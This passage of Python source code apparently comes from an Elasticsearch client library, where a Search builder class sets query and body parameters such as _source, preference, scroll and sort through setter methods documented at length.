are returned for matching documents. These fields are returned in the
``hits._source`` property of the search response. Defaults to ``true``.
Valid values:
- ``true`` (Boolean) The entire document source is returned.
- ``false`` (Boolean) The document source is not returned.
- ``<wildcard_pattern>`` (string or array of strings) Wildcard
(``*``) pattern or array of patterns containing source fields to
return.
- ``<object>`` Object containing a list of source fields to include
or exclude. Properties for <object>:
- ``excludes`` (string or array of strings) Wildcard (``*``)
pattern or array of patterns containing source fields to
exclude from the response. You can also use this property to
exclude fields from the subset specified in includes property.
- ``includes`` (string or array of strings) Wildcard (``*``)
pattern or array of patterns containing source fields to
return. If this property is specified, only these source
fields are returned. You can exclude fields from this subset
using the ``excludes`` property.
:param source_excludes: ``Optional[str]``
A comma-separated list of `source fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
to exclude from the response.
You can also use this parameter to exclude fields from the subset
specified in ``_source_includes`` query parameter.
If the ``_source`` parameter is ``false``, this parameter is ignored.
:param source_includes: ``Optional[str]``
A comma-separated list of `source fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
to include in the response.
If this parameter is specified, only these source fields are returned.
You can exclude fields from this subset using the ``_source_excludes``
query parameter.
If the ``_source`` parameter is ``false``, this parameter is ignored.
:param allow_no_indices: ``bool``
If false, the request returns an error if any wildcard expression,
`index alias
<https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-aliases.html>`__,
or _all value targets only missing or closed indices. This behavior
applies even if the request targets other open indices. For example, a
request targeting ``foo*,bar*`` returns an error if an index starts with
``foo`` but no index starts with ``bar``.
:param allow_partial_search_results: ``bool``
If ``true``, returns partial results if there are request timeouts or
`shard failures
<https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-replication.html#shard-failures>`__.
If ``false``, returns an error with no partial results. Defaults to
``true``.
To override the default for this field, set the
``search.default_allow_partial_results`` cluster setting to false.
:param batched_reduce_size: ``int``
The number of shard results that should be reduced at once on the
coordinating node. This value should be used as a protection mechanism
to reduce the memory overhead per search request if the potential number
of shards in the request can be large. Defaults to ``512``.
:param ccs_minimize_roundtrips: ``bool``
If ``true``, network round-trips between the coordinating node and the
remote clusters are minimized when executing cross-cluster search (CCS)
requests. See `How cross-cluster search handles network delays
<https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-cross-cluster-search.html#ccs-network-delays>`__.
Defaults to ``true``.
:param docvalue_fields: ``Optional[Sequence[Union[str, Mapping[str, str]]]]``
Array of wildcard (``*``) patterns. The request returns doc values for
field names matching these patterns in the ``hits.fields`` property of
the response.
You can specify items in the array as a string or object. See `Doc value
fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-fields.html#docvalue-fields>`__.
Properties of ``docvalue_fields`` objects:
- ``field`` (Required, string) Wildcard pattern. The request returns
doc values for field names matching this pattern.
- ``format`` (Optional, string) Format in which the doc values are
returned.
For `date fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/date.html>`__,
you can specify a [date
format](https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-date-format.html9.
For `numeric fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/number.html>`__,
you can specify a `DecimalFormat pattern
<https://docs.oracle.com/javase/8/docs/api/java/text/DecimalFormat.html>`__.
For other field data types, this parameter is not supported.
:param expand_wildcards: ``str``
Controls what kind of indices that wildcard expressions can expand to.
Multiple values are accepted when separated by a comma, as in
``open,hidden``. Valid values are:
- ``all`` Expand to open and closed indices, including hidden
indices.
- ``open`` Expand only to open indices.
- ``closed`` Expand only to closed indices.
- ``hidden`` Expansion of wildcards will include hidden indices.
Must be combined with open, closed, or both.
- ``none`` Wildcard expressions are not accepted.
Defaults to ``open``
:param explain: ``bool``
If ``true``, returns detailed information about score computation as
part of a hit. Defaults to ``false``.
:param fields: ``Optional[Sequence[Union[str, Mapping[str, str]]]]``
Array of wildcard (``*``) patterns. The request returns values for field
names matching these patterns in the ``hits.fields`` property of the
response.
You can specify items in the array as a string or object. See `Fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-fields.html#search-fields-param>`__
for more details.
Properties of ``fields`` objects:
- ``field`` (Required, string) Wildcard pattern. The request returns
values for field names matching this pattern.
- ``format``
(Optional, string) Format in which the values are returned.
The date fields date and date_nanos accept a date format. Spatial
fields accept either geojson for GeoJSON (the default) or wkt for
Well Known Text.
For other field data types, this parameter is not supported.
:param from_: ``int``
Starting document offset. Defaults to ``0``.
By default, you cannot page through more than ``10,000`` hits using the
from and size parameters. To page through more hits, use the
``search_after`` parameter.
:param ignore_throttled: ``bool``
If ``true``, concrete, expanded or aliased indices will be ignored when
frozen. Defaults to ``true``.
:param ignore_unavailable: ``bool``
If ``true``, missing or closed indices are not included in the response.
Defaults to ``false``.
:param indices_boost: ``Optional[Sequence[Mapping[str, float]]]``
Boosts the ``_score`` of documents from specified indices.
Properties of ``indices_boost`` objects:
``<index>: <boost-value>``
- ``<index>`` is the name of the index or index alias. Wildcard
(``*``) expressions are supported.
- ``<boost-value>`` is the ``float`` factor by which scores are
multiplied.
A boost value greater than ``1.0`` increases the score. A boost
value between ``0`` and ``1.0`` decreases the score.
:param max_concurrent_shard_requests: ``int``
Defines the number of concurrent shard requests per node this search
executes concurrently. This value should be used to limit the impact of
the search on the cluster in order to limit the number of concurrent
shard requests. Defaults to ``5``.
:param min_score: ``Optional[float]``
Minimum ``_score`` for matching documents. Documents with a lower
``_score`` are not included in the search results.
:param pre_filter_shard_size: ``Optional[int]``
Defines a threshold that enforces a pre-filter roundtrip to prefilter
search shards based on query rewriting if the number of shards the
search request expands to exceeds the threshold. This filter roundtrip
can limit the number of shards significantly if for instance a shard can
not match any documents based on its rewrite method ie. if date filters
are mandatory to match but the shard bounds and the query are disjoint.
When unspecified, the pre-filter phase is executed if any of these
conditions is met:
- The request targets more than 128 shards.
- The request targets one or more read-only index.
- The primary sort of the query targets an indexed field.
:param preference: ``Optional[str]``
Nodes and shards used for the search. By default, Elasticsearch selects
from eligible nodes and shards using `adaptive replica selection
<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-shard-routing.html#search-adaptive-replica>`__,
accounting for `allocation awareness
<https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-cluster.html#shard-allocation-awareness>`__.
Valid values:
- ``_only_local`` Run the search only on shards on the local node.
- ``_local`` If possible, run the search on shards on the local
node. If not, select shards using the default method.
- ``_only_nodes:<node-id>,<node-id>`` Run the search on only the
specified nodes IDs. If suitable shards exist on more than one
selected nodes, use shards on those nodes using the default
method. If none of the specified nodes are available, select
shards from any available node using the default method.
- ``_prefer_nodes:<node-id>,<node-id>`` If possible, run the search
on the specified nodes IDs. If not, select shards using the
default method.
- ``_shards:<shard>,<shard>`` Run the search only on the specified
shards. This value can be combined with other preference values,
but this value must come first. For example:
``_shards:2,3|_local``
- ``<custom-string>`` Any string that does not start with _. If the
cluster state and selected shards do not change, searches using
the same ``<custom-string>`` value are routed to the same shards
in the same order.
:param q: ``Optional[str]``
Query in the Lucene query string syntax.
You can use the ``q`` parameter to run a query parameter search. Query
parameter searches do not support the full Elasticsearch `Query DSL
<https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl.html>`__
but are handy for testing.
.. IMPORTANT::
The ``q`` parameter overrides the query parameter in the request
body. If both parameters are specified, documents matching the query
request body parameter are not returned.
:param request_cache: ``Optional[bool]``
If ``true``, the caching of search results is enabled for requests where
``size`` is ``0``. See `Shard request cache settings
<https://www.elastic.co/guide/en/elasticsearch/reference/current/shard-request-cache.html>`__.
Defaults to index level settings.
:param rest_total_hits_as_int: ``bool``
Indicates whether ``hits.total`` should be rendered as an integer or an
object in the rest search response. Defaults to ``false``.
:param routing: ``Optional[str]``
Target the specified primary shard.
:param scroll: ``Optional[str]``
Period to retain the `search context
<https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#scroll-search-context>`__
for scrolling. Format is `Time units
<https://www.elastic.co/guide/en/elasticsearch/reference/current/common-options.html#time-units>`__.
See `Scroll search results
<https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#scroll-search-results>`__.
By default, this value cannot exceed ``1d`` (24 hours). You can change
this limit using the ``search.max_keep_alive`` cluster-level setting.
:param search_type: ``str``
How `distributed term frequencies
<https://en.wikipedia.org/wiki/Tf%E2%80%93idf>`__ are calculated for
`relevance scoring
<https://www.elastic.co/guide/en/elasticsearch/reference/current/query-filter-context.html#relevance-scores>`__.
Valid values:
- ``query_then_fetch`` (Default) Distributed term frequencies are
calculated locally for each shard running the search. We recommend
this option for faster searches with potentially less accurate
scoring.
- ``dfs_query_then_fetch`` Distributed term frequencies are
calculated globally, using information gathered from all shards
running the search. While this option increases the accuracy of
scoring, it adds a round-trip to each shard, which can result in
slower searches.
:param seq_no_primary_term: ``bool``
If ``true``, returns sequence number and primary term of the last
modification of each hit. See `Optimistic concurrency control
<https://www.elastic.co/guide/en/elasticsearch/reference/current/optimistic-concurrency-control.html>`__.
:param size: ``int``
Defines the number of hits to return. Defaults to ``10``.
By default, you cannot page through more than ``10,000`` hits using the
from and size parameters. To page through more hits, use the
`search_after
<https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#search-after>`__
parameter.
:param sort: ``Optional[Union[str, Sequence[Union[str, Mapping[str, str]]], Mapping[str, str]]]``
Change the order of the returned documents. See `sort search results
<https://www.elastic.co/guide/en/elasticsearch/reference/current/sort-search-results.html>`__.
The parameter can be:
- ``"field"`` or ``"-field"`` to sort a field ascending or
descending
- ``{"field": "asc"}`` or ``{"field": "desc"}`` to sort a field
ascending or descending
- a ``list`` of strings or objects as above to sort by a couple of
fields
- ``None`` to turn off sorting
:param stats: ``Optional[Sequence[str]]``
Stats groups to associate with the search. Each group maintains a
statistics aggregation for its associated searches. You can retrieve
these stats using the `indices stats API
<https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-stats.html>`__.
:param stored_fields: ``Optional[str]``
A comma-separated list of stored fields to return as part of a hit. If
no fields are specified, no stored fields are included in the response.
If this field is specified, the ``_source`` parameter defaults to
``false``. You can pass ``_source: true`` to return both source fields
and stored fields in the search response.
:param suggest_field: ``Optional[str]``
Specifies which field to use for suggestions.
:param suggest_text: ``Optional[str]``
The source text for which the suggestions should be returned.
:param terminate_after: ``int``
The maximum number of documents to collect for each shard, upon reaching
which the query execution will terminate early.
Defaults to ``0``, which does not terminate query execution early.
:param timeout: ``Optional[str]``
Specifies the period of time to wait for a response in `time units
<https://www.elastic.co/guide/en/elasticsearch/reference/current/common-options.html#time-units>`__.
If no response is received before the timeout expires, the request fails
and returns an error. Defaults to no timeout.
:param track_scores: ``bool``
If ``true``, calculate and return document scores, even if the scores
are not used for sorting. Defaults to ``false``.
:param track_total_hits: ``Union[int, bool]``
Number of hits matching the query to count accurately. Defaults to
``10000``.
If ``true``, the exact number of hits is returned at the cost of some
performance.
If ``false``, the response does not include the total number of hits
matching the query.
:param typed_keys: ``bool``
If ``true``, aggregation and suggester names are being prefixed by their
respective types in the response. Defaults to ``true``.
:param version: ``bool``
If ``true``, returns document version as part of a hit. Defaults to
``false``.
:returns: ``Search``
A new Search instance is created
"""
s = self._search.copy()
if source is not Unset:
s._parameters._params["_source"] = source
if source_excludes is not Unset:
s._parameters._params["_source_excludes"] = source_excludes
if source_includes is not Unset:
s._parameters._params["_source_includes"] = source_includes
if allow_no_indices is not Unset:
s._parameters._params["allow_no_indices"] = allow_no_indices
if allow_partial_search_results is not Unset:
s._parameters._params["allow_partial_search_results"] = allow_partial_search_results
if batched_reduce_size is not Unset:
s._parameters._params["batched_reduce_size"] = batched_reduce_size
if ccs_minimize_roundtrips is not Unset:
s._parameters._params["ccs_minimize_roundtrips"] = ccs_minimize_roundtrips
if docvalue_fields is not Unset:
s._parameters._params["docvalue_fields"] = docvalue_fields
if expand_wildcards is not Unset:
s._parameters._params["expand_wildcards"] = expand_wildcards
if explain is not Unset:
s._parameters._params["explain"] = explain
if fields is not Unset:
s._parameters._params["fields"] = fields
if from_ is not Unset:
s._parameters._params["from"] = from_
if ignore_throttled is not Unset:
s._parameters._params["ignore_throttled"] = ignore_throttled
if ignore_unavailable is not Unset:
s._parameters._params["ignore_unavailable"] = ignore_unavailable
if indices_boost is not Unset:
s._parameters._params["indices_boost"] = indices_boost
if max_concurrent_shard_requests is not Unset:
s._parameters._params["max_concurrent_shard_requests"] = max_concurrent_shard_requests
if min_score is not Unset:
s._parameters._params["min_score"] = min_score
if pre_filter_shard_size is not Unset:
s._parameters._params["pre_filter_shard_size"] = pre_filter_shard_size
if preference is not Unset:
s._parameters._params["preference"] = preference
if q is not Unset:
s._parameters._params["q"] = q
if request_cache is not Unset:
s._parameters._params["request_cache"] = request_cache
if rest_total_hits_as_int is not Unset:
s._parameters._params["rest_total_hits_as_int"] = rest_total_hits_as_int
if routing is not Unset:
s._parameters._params["routing"] = routing
if scroll is not Unset:
s._parameters._params["scroll"] = scroll
if search_type is not Unset:
s._parameters._params["search_type"] = search_type
if seq_no_primary_term is not Unset:
s._parameters._params["seq_no_primary_term"] = seq_no_primary_term
if size is not Unset:
s._parameters._params["size"] = size
if sort is not Unset:
s._parameters._params["sort"] = sort
if stats is not Unset:
s._parameters._params["stats"] = stats
if stored_fields is not Unset:
s._parameters._params["stored_fields"] = stored_fields
if suggest_field is not Unset:
s._parameters._params["suggest_field"] = suggest_field
if suggest_text is not Unset:
s._parameters._params["suggest_text"] = suggest_text
if terminate_after is not Unset:
s._parameters._params["terminate_after"] = terminate_after
if timeout is not Unset:
s._parameters._params["timeout"] = timeout
if track_scores is not Unset:
s._parameters._params["track_scores"] = track_scores
if track_total_hits is not Unset:
s._parameters._params["track_total_hits"] = track_total_hits
if typed_keys is not Unset:
s._parameters._params["typed_keys"] = typed_keys
if version is not Unset:
s._parameters._params["version"] = version
return s
def source(
self,
value: Union[bool, str, Sequence] = True,
) -> Search:
"""
A search **body** parameter.
:param value: ``Union[bool, str, Sequence]``
Indicates which `source fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
are returned for matching documents. These fields are returned in the
``hits._source`` property of the search response. Defaults to ``true``.
Valid values:
- ``true`` (Boolean) The entire document source is returned.
- ``false`` (Boolean) The document source is not returned.
- ``<wildcard_pattern>`` (string or array of strings) Wildcard
(``*``) pattern or array of patterns containing source fields to
return.
- ``<object>`` Object containing a list of source fields to include
or exclude. Properties for <object>:
- ``excludes`` (string or array of strings) Wildcard (``*``)
pattern or array of patterns containing source fields to
exclude from the response. You can also use this property to
exclude fields from the subset specified in includes property.
- ``includes`` (string or array of strings) Wildcard (``*``)
pattern or array of patterns containing source fields to
return. If this property is specified, only these source
fields are returned. You can exclude fields from this subset
using the ``excludes`` property.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("_source", value)
def source_excludes(
self,
value: Optional[str] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[str]``
A comma-separated list of `source fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
to exclude from the response.
You can also use this parameter to exclude fields from the subset
specified in ``_source_includes`` query parameter.
If the ``_source`` parameter is ``false``, this parameter is ignored.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("_source_excludes", value)
def source_includes(
self,
value: Optional[str] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[str]``
A comma-separated list of `source fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
to include in the response.
If this parameter is specified, only these source fields are returned.
You can exclude fields from this subset using the ``_source_excludes``
query parameter.
If the ``_source`` parameter is ``false``, this parameter is ignored.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("_source_includes", value)
def allow_no_indices(
self,
value: bool = True,
) -> Search:
"""
A search **query** parameter.
:param value: ``bool``
If false, the request returns an error if any wildcard expression,
`index alias
<https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-aliases.html>`__,
or _all value targets only missing or closed indices. This behavior
applies even if the request targets other open indices. For example, a
request targeting ``foo*,bar*`` returns an error if an index starts with
``foo`` but no index starts with ``bar``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("allow_no_indices", value)
def allow_partial_search_results(
self,
value: bool = True,
) -> Search:
"""
A search **query** parameter.
:param value: ``bool``
If ``true``, returns partial results if there are request timeouts or
`shard failures
<https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-replication.html#shard-failures>`__.
If ``false``, returns an error with no partial results. Defaults to
``true``.
To override the default for this field, set the
``search.default_allow_partial_results`` cluster setting to false.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("allow_partial_search_results", value)
def batched_reduce_size(
self,
value: int = 512,
) -> Search:
"""
A search **query** parameter.
:param value: ``int``
The number of shard results that should be reduced at once on the
coordinating node. This value should be used as a protection mechanism
to reduce the memory overhead per search request if the potential number
of shards in the request can be large. Defaults to ``512``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("batched_reduce_size", value)
def ccs_minimize_roundtrips(
self,
value: bool = True,
) -> Search:
"""
A search **query** parameter.
:param value: ``bool``
If ``true``, network round-trips between the coordinating node and the
remote clusters are minimized when executing cross-cluster search (CCS)
requests. See `How cross-cluster search handles network delays
<https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-cross-cluster-search.html#ccs-network-delays>`__.
Defaults to ``true``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("ccs_minimize_roundtrips", value)
def docvalue_fields(
self,
value: Optional[Sequence[Union[str, Mapping[str, str]]]] = None,
) -> Search:
"""
A search **body** parameter.
:param value: ``Optional[Sequence[Union[str, Mapping[str, str]]]]``
Array of wildcard (``*``) patterns. The request returns doc values for
field names matching these patterns in the ``hits.fields`` property of
the response.
You can specify items in the array as a string or object. See `Doc value
fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-fields.html#docvalue-fields>`__.
Properties of ``docvalue_fields`` objects:
- ``field`` (Required, string) Wildcard pattern. The request returns
doc values for field names matching this pattern.
- ``format`` (Optional, string) Format in which the doc values are
returned.
For `date fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/date.html>`__,
you can specify a [date
format](https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-date-format.html9.
For `numeric fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/number.html>`__,
you can specify a `DecimalFormat pattern
<https://docs.oracle.com/javase/8/docs/api/java/text/DecimalFormat.html>`__.
For other field data types, this parameter is not supported.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("docvalue_fields", value)
def expand_wildcards(
self,
value: str = 'open',
) -> Search:
"""
A search **query** parameter.
:param value: ``str``
Controls what kind of indices that wildcard expressions can expand to.
Multiple values are accepted when separated by a comma, as in
``open,hidden``. Valid values are:
- ``all`` Expand to open and closed indices, including hidden
indices.
- ``open`` Expand only to open indices.
- ``closed`` Expand only to closed indices.
- ``hidden`` Expansion of wildcards will include hidden indices.
Must be combined with open, closed, or both.
- ``none`` Wildcard expressions are not accepted.
Defaults to ``open``
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("expand_wildcards", value)
def explain(
self,
value: bool = False,
) -> Search:
"""
A search **body** parameter.
:param value: ``bool``
If ``true``, returns detailed information about score computation as
part of a hit. Defaults to ``false``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("explain", value)
def fields(
self,
value: Optional[Sequence[Union[str, Mapping[str, str]]]] = None,
) -> Search:
"""
A search **body** parameter.
:param value: ``Optional[Sequence[Union[str, Mapping[str, str]]]]``
Array of wildcard (``*``) patterns. The request returns values for field
names matching these patterns in the ``hits.fields`` property of the
response.
You can specify items in the array as a string or object. See `Fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-fields.html#search-fields-param>`__
for more details.
Properties of ``fields`` objects:
- ``field`` (Required, string) Wildcard pattern. The request returns
values for field names matching this pattern.
- ``format``
(Optional, string) Format in which the values are returned.
The date fields date and date_nanos accept a date format. Spatial
fields accept either geojson for GeoJSON (the default) or wkt for
Well Known Text.
For other field data types, this parameter is not supported.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("fields", value)
def from_(
self,
value: int = 0,
) -> Search:
"""
A search **body** parameter.
:param value: ``int``
Starting document offset. Defaults to ``0``.
By default, you cannot page through more than ``10,000`` hits using the
from and size parameters. To page through more hits, use the
``search_after`` parameter.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("from", value)
def ignore_throttled(
self,
value: bool = True,
) -> Search:
"""
A search **query** parameter.
:param value: ``bool``
If ``true``, concrete, expanded or aliased indices will be ignored when
frozen. Defaults to ``true``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("ignore_throttled", value)
def ignore_unavailable(
self,
value: bool = False,
) -> Search:
"""
A search **query** parameter.
:param value: ``bool``
If ``true``, missing or closed indices are not included in the response.
Defaults to ``false``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("ignore_unavailable", value)
def indices_boost(
self,
value: Optional[Sequence[Mapping[str, float]]] = None,
) -> Search:
"""
A search **body** parameter.
:param value: ``Optional[Sequence[Mapping[str, float]]]``
Boosts the ``_score`` of documents from specified indices.
Properties of ``indices_boost`` objects:
``<index>: <boost-value>``
- ``<index>`` is the name of the index or index alias. Wildcard
(``*``) expressions are supported.
- ``<boost-value>`` is the ``float`` factor by which scores are
multiplied.
A boost value greater than ``1.0`` increases the score. A boost
value between ``0`` and ``1.0`` decreases the score.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("indices_boost", value)
def max_concurrent_shard_requests(
self,
value: int = 5,
) -> Search:
"""
A search **query** parameter.
:param value: ``int``
Defines the number of concurrent shard requests per node this search
executes concurrently. This value should be used to limit the impact of
the search on the cluster in order to limit the number of concurrent
shard requests. Defaults to ``5``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("max_concurrent_shard_requests", value)
def min_score(
self,
value: Optional[float] = None,
) -> Search:
"""
A search **body** parameter.
:param value: ``Optional[float]``
Minimum ``_score`` for matching documents. Documents with a lower
``_score`` are not included in the search results.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("min_score", value)
def pre_filter_shard_size(
self,
value: Optional[int] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[int]``
Defines a threshold that enforces a pre-filter roundtrip to prefilter
search shards based on query rewriting if the number of shards the
search request expands to exceeds the threshold. This filter roundtrip
can limit the number of shards significantly if for instance a shard can
not match any documents based on its rewrite method ie. if date filters
are mandatory to match but the shard bounds and the query are disjoint.
When unspecified, the pre-filter phase is executed if any of these
conditions is met:
- The request targets more than 128 shards.
- The request targets one or more read-only index.
- The primary sort of the query targets an indexed field.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("pre_filter_shard_size", value)
def preference(
self,
value: Optional[str] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[str]``
Nodes and shards used for the search. By default, Elasticsearch selects
from eligible nodes and shards using `adaptive replica selection
<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-shard-routing.html#search-adaptive-replica>`__,
accounting for `allocation awareness
<https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-cluster.html#shard-allocation-awareness>`__.
Valid values:
- ``_only_local`` Run the search only on shards on the local node.
- ``_local`` If possible, run the search on shards on the local
node. If not, select shards using the default method.
- ``_only_nodes:<node-id>,<node-id>`` Run the search on only the
specified nodes IDs. If suitable shards exist on more than one
selected nodes, use shards on those nodes using the default
method. If none of the specified nodes are available, select
shards from any available node using the default method.
- ``_prefer_nodes:<node-id>,<node-id>`` If possible, run the search
on the specified nodes IDs. If not, select shards using the
default method.
- ``_shards:<shard>,<shard>`` Run the search only on the specified
shards. This value can be combined with other preference values,
but this value must come first. For example:
``_shards:2,3|_local``
- ``<custom-string>`` Any string that does not start with _. If the
cluster state and selected shards do not change, searches using
the same ``<custom-string>`` value are routed to the same shards
in the same order.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("preference", value)
def q(
self,
value: Optional[str] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[str]``
Query in the Lucene query string syntax.
You can use the ``q`` parameter to run a query parameter search. Query
parameter searches do not support the full Elasticsearch `Query DSL
<https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl.html>`__
but are handy for testing.
.. IMPORTANT::
The ``q`` parameter overrides the query parameter in the request
body. If both parameters are specified, documents matching the query
request body parameter are not returned.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("q", value)
def request_cache(
self,
value: Optional[bool] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[bool]``
If ``true``, the caching of search results is enabled for requests where
``size`` is ``0``. See `Shard request cache settings
<https://www.elastic.co/guide/en/elasticsearch/reference/current/shard-request-cache.html>`__.
Defaults to index level settings.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("request_cache", value)
def rest_total_hits_as_int(
self,
value: bool = False,
) -> Search:
"""
A search **query** parameter.
:param value: ``bool``
Indicates whether ``hits.total`` should be rendered as an integer or an
object in the rest search response. Defaults to ``false``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("rest_total_hits_as_int", value)
def routing(
self,
value: Optional[str] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[str]``
Target the specified primary shard.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("routing", value)
def scroll(
self,
value: Optional[str] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[str]``
Period to retain the `search context
<https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#scroll-search-context>`__
for scrolling. Format is `Time units
<https://www.elastic.co/guide/en/elasticsearch/reference/current/common-options.html#time-units>`__.
See `Scroll search results
<https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#scroll-search-results>`__.
By default, this value cannot exceed ``1d`` (24 hours). You can change
this limit using the ``search.max_keep_alive`` cluster-level setting.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("scroll", value)
def search_type(
self,
value: str = 'query_then_fetch',
) -> Search:
"""
A search **query** parameter.
:param value: ``str``
How `distributed term frequencies
<https://en.wikipedia.org/wiki/Tf%E2%80%93idf>`__ are calculated for
`relevance scoring
<https://www.elastic.co/guide/en/elasticsearch/reference/current/query-filter-context.html#relevance-scores>`__.
Valid values:
- ``query_then_fetch`` (Default) Distributed term frequencies are
calculated locally for each shard running the search. We recommend
this option for faster searches with potentially less accurate
scoring.
- ``dfs_query_then_fetch`` Distributed term frequencies are
calculated globally, using information gathered from all shards
running the search. While this option increases the accuracy of
scoring, it adds a round-trip to each shard, which can result in
slower searches.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("search_type", value)
def seq_no_primary_term(
self,
value: bool = False,
) -> Search:
"""
A search **body** parameter.
:param value: ``bool``
If ``true``, returns sequence number and primary term of the last
modification of each hit. See `Optimistic concurrency control
<https://www.elastic.co/guide/en/elasticsearch/reference/current/optimistic-concurrency-control.html>`__.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("seq_no_primary_term", value)
def size(
self,
value: int = 10,
) -> Search:
"""
A search **body** parameter.
:param value: ``int``
Defines the number of hits to return. Defaults to ``10``.
By default, you cannot page through more than ``10,000`` hits using the
from and size parameters. To page through more hits, use the
`search_after
<https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#search-after>`__
parameter.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("size", value)
def sort(
self,
value: Optional[Union[str, Sequence[Union[str, Mapping[str, str]]], Mapping[str, str]]] = None,
) -> Search:
"""
A search **body** parameter.
:param value: ``Optional[Union[str, Sequence[Union[str, Mapping[str, str]]], Mapping[str, str]]]``
Change the order of the returned documents. See `sort search results
<https://www.elastic.co/guide/en/elasticsearch/reference/current/sort-search-results.html>`__.
The parameter can be:
- ``"field"`` or ``"-field"`` to sort a field ascending or
descending
- ``{"field": "asc"}`` or ``{"field": "desc"}`` to sort a field
ascending or descending
- a ``list`` of strings or objects as above to sort by a couple of
fields
- ``None`` to turn off sorting
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("sort", value)
def stats(
self,
value: Optional[Sequence[str]] = None,
) -> Search:
"""
A search **body** parameter.
:param value: ``Optional[Sequence[str]]``
Stats groups to associate with the search. Each group maintains a
statistics aggregation for its associated searches. You can retrieve
these stats using the `indices stats API
<https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-stats.html>`__.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("stats", value)
def stored_fields(
self,
value: Optional[str] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[str]``
A comma-separated list of stored fields to return as part of a hit. If
no fields are specified, no stored fields are included in the response.
If this field is specified, the ``_source`` parameter defaults to
``false``. You can pass ``_source: true`` to return both source fields
and stored fields in the search response.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("stored_fields", value)
def suggest_field(
self,
value: Optional[str] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[str]``
Specifies which field to use for suggestions.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("suggest_field", value)
def suggest_text(
self,
value: Optional[str] = None,
) -> Search:
"""
A search **query** parameter.
:param value: ``Optional[str]``
The source text for which the suggestions should be returned.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("suggest_text", value)
def terminate_after(
self,
value: int = 0,
) -> Search:
"""
A search **body** parameter.
:param value: ``int``
The maximum number of documents to collect for each shard, upon reaching
which the query execution will terminate early.
Defaults to ``0``, which does not terminate query execution early.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("terminate_after", value)
def timeout(
self,
value: Optional[str] = None,
) -> Search:
"""
A search **query** parameter.
